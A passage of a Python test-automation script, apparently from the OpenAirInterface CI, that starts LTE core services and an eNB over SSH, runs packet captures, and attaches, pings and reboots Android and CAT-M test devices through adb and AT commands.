if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS')
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_hss 2>&1 | stdbuf -o0 awk \'{ print strftime("[%Y/%m/%d %H:%M:%S] ",systime()) $0 }\' | stdbuf -o0 tee -a hss_' + self.testCase_id + '.log &', 'Core state: 2 -> 3', 35)
else:
logging.debug('Using the ltebox simulated HSS')
self.command('if [ -d ' + self.EPCSourceCodePath + '/scripts ]; then echo ' + self.eNBPassword + ' | sudo -S rm -Rf ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('mkdir -p ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('cd /opt/hss_sim0609', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f hss.log daemon.log', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S echo "Starting sudo session" && sudo daemon --unsafe --name=simulated_hss --chdir=/opt/hss_sim0609 ./starthss_real ', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeMME(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('stdbuf -o0 hostname', '\$', 5)
result = re.search('hostname\\\\r\\\\n(?P<host_name>[a-zA-Z0-9\-\_]+)\\\\r\\\\n', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m Hostname Not Found! \u001B[0m')
sys.exit(1)
host_name = result.group('host_name')
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_mme 2>&1 | stdbuf -o0 tee -a mme_' + self.testCase_id + '.log &', 'MME app initialization complete', 100)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_mme', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeSPGW(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_spgw 2>&1 | stdbuf -o0 tee -a spgw_' + self.testCase_id + '.log &', 'Initializing SPGW-APP task interface: DONE', 30)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_xGw', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeeNB(self):
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '' or self.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = True
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow(self.Initialize_eNB_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
# If tracer options is on, running tshark on EPC side and capture traffic b/ EPC and eNB
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('ip addr show | awk -f /tmp/active_net_interfaces.awk | egrep -v "lo|tun"', '\$', 5)
result = re.search('interfaceToUse=(?P<eth_interface>[a-zA-Z0-9\-\_]+)done', str(self.ssh.before))
if result is not None:
eth_interface = result.group('eth_interface')
logging.debug('\u001B[1m Launching tshark on interface ' + eth_interface + '\u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f /tmp/enb_' + self.testCase_id + '_s1log.pcap', '\$', 5)
self.command('echo $USER; nohup sudo tshark -f "host ' + self.eNBIPAddress +'" -i ' + eth_interface + ' -w /tmp/enb_' + self.testCase_id + '_s1log.pcap > /tmp/tshark.log 2>&1 &', self.EPCUserName, 5)
self.close()
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
# Initialize_eNB_args usually start with -O and followed by the location in repository
full_config_file = self.Initialize_eNB_args.replace('-O ','')
extra_options = ''
extIdx = full_config_file.find('.conf')
if (extIdx > 0):
extra_options = full_config_file[extIdx + 5:]
# if tracer options is on, compiling and running T Tracer
result = re.search('T_stdout', str(extra_options))
if result is not None:
logging.debug('\u001B[1m Compiling and launching T Tracer\u001B[0m')
self.command('cd common/utils/T/tracer', '\$', 5)
self.command('make', '\$', 10)
self.command('echo $USER; nohup ./record -d ../T_messages.txt -o ' + self.eNBSourceCodePath + '/cmake_targets/enb_' + self.testCase_id + '_record.raw -ON -off VCD -off HEAVY -off LEGACY_GROUP_TRACE -off LEGACY_GROUP_DEBUG > ' + self.eNBSourceCodePath + '/cmake_targets/enb_' + self.testCase_id + '_record.log 2>&1 &', self.eNBUserName, 5)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
full_config_file = full_config_file[:extIdx + 5]
config_path, config_file = os.path.split(full_config_file)
else:
sys.exit('Insufficient Parameter')
ci_full_config_file = config_path + '/ci-' + config_file
rruCheck = False
result = re.search('rru', str(config_file))
if result is not None:
rruCheck = True
# do not reset board twice in IF4.5 case
result = re.search('rru|enb', str(config_file))
if result is not None:
self.command('echo ' + self.eNBPassword + ' | sudo -S uhd_find_devices', '\$', 5)
result = re.search('type: b200', str(self.ssh.before))
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
self.command('echo ' + self.eNBPassword + ' | sudo -S sudo b2xx_fx3_utils --reset-device', '\$', 5)
# Reloading FGPA bin firmware
self.command('echo ' + self.eNBPassword + ' | sudo -S uhd_find_devices', '\$', 5)
# Make a copy and adapt to EPC / eNB IP addresses
self.command('cp ' + full_config_file + ' ' + ci_full_config_file, '\$', 5)
self.command('sed -i -e \'s/CI_MME_IP_ADDR/' + self.EPCIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_ENB_IP_ADDR/' + self.eNBIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
# Launch eNB with the modified config file
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo "ulimit -c unlimited && ./lte_build_oai/build/lte-softmodem -O ' + self.eNBSourceCodePath + '/' + ci_full_config_file + extra_options + '" > ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh ', '\$', 5)
self.command('chmod 775 ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh ', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm -Rf enb_' + self.testCase_id + '.log', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S -E daemon --inherit --unsafe --name=enb' + str(self.eNB_instance) + '_daemon --chdir=' + self.eNBSourceCodePath + '/cmake_targets -o ' + self.eNBSourceCodePath + '/cmake_targets/enb_' + self.testCase_id + '.log ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
if not rruCheck:
self.eNBLogFile = 'enb_' + self.testCase_id + '.log'
if extra_options != '':
self.eNBOptions = extra_options
time.sleep(6)
doLoop = True
loopCounter = 10
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# In case of T tracer recording, we may need to kill it
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.command('killall --signal SIGKILL record', '\$', 5)
self.close()
doLoop = False
logging.error('\u001B[1;37;41m eNB logging system did not show got sync! \u001B[0m')
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'KO', ALL_PROCESSES_OK)
self.CreateHtmlTabFooter(False)
# In case of T tracer recording, we need to kill tshark on EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
self.close()
time.sleep(1)
pcap_log_file = 'enb_' + self.testCase_id + '_s1log.pcap'
copyin_res = self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + pcap_log_file, '.')
if (copyin_res == 0):
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, pcap_log_file, self.eNBSourceCodePath + '/cmake_targets/.')
sys.exit(1)
else:
self.command('stdbuf -o0 cat enb_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
if rruCheck:
result = re.search('wait RUs', str(self.ssh.before))
else:
result = re.search('got sync', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
if rruCheck and extra_options != '':
self.rruOptions = extra_options
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'OK', ALL_PROCESSES_OK)
logging.debug('\u001B[1m Initialize eNB Completed\u001B[0m')
self.close()
def InitializeUE_common(self, device_id):
logging.debug('send adb commands')
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# The following commands are deprecated since we no longer work on Android 7+
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell settings put global airplane_mode_on 1', '\$', 10)
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true', '\$', 60)
# a dedicated script has to be installed inside the UE
# airplane mode on means call /data/local/tmp/off
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
#airplane mode off means call /data/local/tmp/on
logging.debug('\u001B[1mUE (' + device_id + ') Initialize Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def InitializeUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.InitializeUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def checkDevTTYisUnlocked(self):
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
count = 0
while count < 5:
self.command('echo ' + self.ADBPassword + ' | sudo -S lsof | grep ttyUSB0', '\$', 10)
result = re.search('picocom', str(self.ssh.before))
if result is None:
count = 10
else:
time.sleep(5)
count = count + 1
self.close()
def InitializeCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
# Checking if auto-attach is enabled
self.command('AT^AUTOATT?', 'OK', 5)
result = re.search('AUTOATT: (?P<state>[0-9\-]+)', str(self.ssh.before))
if result is not None:
if result.group('state') is not None:
autoAttachState = int(result.group('state'))
if autoAttachState is not None:
if autoAttachState == 0:
self.command('AT^AUTOATT=1', 'OK', 5)
logging.debug('\u001B[1m Auto-Attach enabled\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Could not check Auto-Attach! \u001B[0m')
# Force closure of picocom but device might still be locked
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def TerminateCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def AttachCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Enabling the Radio
self.command('AT+CFUN=1', 'SIMSTORE,READY', 5)
logging.debug('\u001B[1m Cellular Functionality enabled\u001B[0m')
time.sleep(4)
# We should check if we register
count = 0
attach_cnt = 0
attach_status = False
while count < 5:
self.command('AT+CEREG?', 'OK', 5)
result = re.search('CEREG: 2,(?P<state>[0-9\-]+),', str(self.ssh.before))
if result is not None:
mDataConnectionState = int(result.group('state'))
if mDataConnectionState is not None:
if mDataConnectionState == 1:
count = 10
attach_status = True
result = re.search('CEREG: 2,1,"(?P<networky>[0-9A-Z]+)","(?P<networkz>[0-9A-Z]+)"', str(self.ssh.before))
if result is not None:
networky = result.group('networky')
networkz = result.group('networkz')
logging.debug('\u001B[1m CAT-M module attached to eNB (' + str(networky) + '/' + str(networkz) + ')\u001B[0m')
else:
logging.debug('\u001B[1m CAT-M module attached to eNB\u001B[0m')
else:
logging.debug('+CEREG: 2,' + str(mDataConnectionState))
attach_cnt = attach_cnt + 1
else:
logging.debug(str(self.ssh.before))
attach_cnt = attach_cnt + 1
count = count + 1
time.sleep(1)
if attach_status:
self.command('AT+CESQ', 'OK', 5)
result = re.search('CESQ: 99,99,255,255,(?P<rsrq>[0-9]+),(?P<rsrp>[0-9]+)', str(self.ssh.before))
if result is not None:
nRSRQ = int(result.group('rsrq'))
nRSRP = int(result.group('rsrp'))
if (nRSRQ is not None) and (nRSRP is not None):
logging.debug(' RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB')
logging.debug(' RSRP = ' + str(-140+nRSRP) + ' dBm')
self.close()
self.picocom_closure = False
html_queue = SimpleQueue()
self.checkDevTTYisUnlocked()
if attach_status:
html_cell = '<pre style="background-color:white">CAT-M module\nAttachment Completed in ' + str(attach_cnt+4) + ' seconds'
if (nRSRQ is not None) and (nRSRP is not None):
html_cell += '\n RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB'
html_cell += '\n RSRP = ' + str(-140+nRSRP) + ' dBm</pre>'
else:
html_cell += '</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'OK', 1, html_queue)
else:
html_cell = '<pre style="background-color:white">CAT-M module\nAttachment Failed</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'KO', 1, html_queue)
def PingCatM(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
try:
statusQueue = SimpleQueue()
lock = Lock()
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS: not implemented yet')
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
self.command('egrep --color=never "Allocated ipv4 addr" /opt/ltebox/var/log/xGwLog.0', '\$', 5)
result = re.search('Allocated ipv4 addr: (?P<ipaddr>[0-9\.]+) from Pool', str(self.ssh.before))
if result is not None:
moduleIPAddr = result.group('ipaddr')
else:
return
ping_time = re.findall("-c (\d+)",str(self.ping_args))
device_id = 'catm'
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + str(moduleIPAddr) + ' 2>&1 | stdbuf -o0 tee -a ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(moduleIPAddr) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + moduleIPAddr + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
if packetloss is not None:
if float(packetloss) > float(self.ping_packetloss_threshold):
qMsg += '\nPacket Loss too high'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
packetLossOK = False
elif float(packetloss) > 0:
qMsg += '\nPacket Loss is not 0%'
logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
lock.release()
self.close()
html_cell = '<pre style="background-color:white">CAT-M module\nIP Address : ' + moduleIPAddr + '\n' + qMsg + '</pre>'
statusQueue.put(html_cell)
if (packetLossOK):
self.CreateHtmlTestRowQueue(self.ping_args, 'OK', 1, statusQueue)
else:
self.CreateHtmlTestRowQueue(self.ping_args, 'KO', 1, statusQueue)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE_common(self, device_id, statusQueue, lock):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
time.sleep(2)
max_count = 45
count = max_count
while count > 0:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('mDataConnectionState Not Found!')
lock.release()
break
mDataConnectionState = int(result.group('state'))
if mDataConnectionState == 2:
logging.debug('\u001B[1mUE (' + device_id + ') Attach Completed\u001B[0m')
lock.acquire()
statusQueue.put(max_count - count)
statusQueue.put(device_id)
statusQueue.put('Attach Completed')
lock.release()
break
count = count - 1
if count == 15 or count == 30:
logging.debug('\u001B[1;30;43m Retry UE (' + device_id + ') Flight Mode Off \u001B[0m')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
time.sleep(0.5)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
time.sleep(0.5)
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until mDataConnectionState=2 (' + str(max_count-count) + ' times)\u001B[0m')
time.sleep(1)
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Attach Failed \u001B[0m')
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put('Attach Failed')
lock.release()
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AttachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
status_queue = SimpleQueue()
lock = Lock()
nb_ue_to_connect = 0
for device_id in self.UEDevices:
if (self.nbMaxUEtoAttach == -1) or (nb_ue_to_connect < self.nbMaxUEtoAttach):
p = Process(target = self.AttachUE_common, args = (device_id, status_queue, lock,))
p.daemon = True
p.start()
multi_jobs.append(p)
nb_ue_to_connect = nb_ue_to_connect + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow('N/A', 'KO', ALL_PROCESSES_OK)
self.CreateHtmlTabFooter(False)
self.AutoTerminateUEandeNB()
sys.exit(1)
else:
attach_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
attach_status = False
device_id = status_queue.get()
message = status_queue.get()
if (count < 0):
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
else:
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + ' in ' + str(count + 2) + ' seconds</pre>'
html_queue.put(html_cell)
if (attach_status):
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
else:
self.CreateHtmlTestRowQueue('N/A', 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
def DetachUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DetachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.DetachUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
def RebootUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
previousmDataConnectionStates = []
# Save mDataConnectionState
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
sys.exit(1)
previousmDataConnectionStates.append(int(result.group('state')))
# Reboot UE
self.command('stdbuf -o0 adb -s ' + device_id + ' shell reboot', '\$', 10)
time.sleep(60)
previousmDataConnectionState = previousmDataConnectionStates.pop(0)
count = 180
while count > 0:
count = count - 1
self.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', str(self.ssh.before))
if result is None:
mDataConnectionState = None
else:
mDataConnectionState = int(result.group('state'))
logging.debug('mDataConnectionState = ' + result.group('state'))
if mDataConnectionState is None or (previousmDataConnectionState == 2 and mDataConnectionState != 2):
logging.debug('\u001B[1mWait UE (' + device_id + ') a second until reboot completion (' + str(180-count) + ' times)\u001B[0m')
time.sleep(1)
else:
logging.debug('\u001B[1mUE (' + device_id + ') Reboot Completed\u001B[0m')
break
if count == 0:
logging.debug('\u001B[1;37;41m UE (' + device_id + ') Reboot Failed \u001B[0m')
sys.exit(1)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def RebootUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
initialize_eNB_flag = False
pStatus = self.CheckProcessExist(initialize_eNB_flag)
if (pStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.RebootUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def GetAllUEDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('adb devices', '\$', 15)
self.UEDevices = re.findall("\\\\r\\\\n([A-Za-z0-9]+)\\\\tdevice",str(self.ssh.before))
if terminate_ue_flag == False:
if len(self.UEDevices) == 0:
logging.debug('\u001B[1;37;41m UE Not Found! \u001B[0m')
sys.exit(1)
self.close()
def GetAllCatMDevices(self, terminate_ue_flag):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
self.command('lsusb | egrep "Future Technology Devices International, Ltd FT2232C" | sed -e "s#:.*##" -e "s# #_#g"', '\$', 15)
self.CatMDevices = re.findall("\\\\r\\\\n([A-Za-z0-9_]+)",str(self.ssh.before))
if terminate_ue_flag == False:
if len(self.CatMDevices) == 0:
logging.debug('\u001B[1;37;41m CAT-M UE Not Found! \u001B[0m')
sys.exit(1)
self.close()
def GetAllUEIPAddresses(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
ue_ip_status = 0
self.UEIPAddresses = []
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
for device_id in self.UEDevices:
count = 0
while count < 4:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ip addr show | grep rmnet', '\$', 15)
result = re.search('inet (?P<ueipaddress>[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\/[0-9]+[0-9a-zA-Z\.\s]+', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m UE IP Address Not Found! \u001B[0m')
time.sleep(1)
count += 1
else:
count = 10
if count < 9:
ue_ip_status -= 1
continue
UE_IPAddress = result.group('ueipaddress')
logging.debug('\u001B[1mUE (' + device_id + ') IP Address is ' + UE_IPAddress + '\u001B[0m')
for ueipaddress in self.UEIPAddresses:
if ueipaddress == UE_IPAddress:
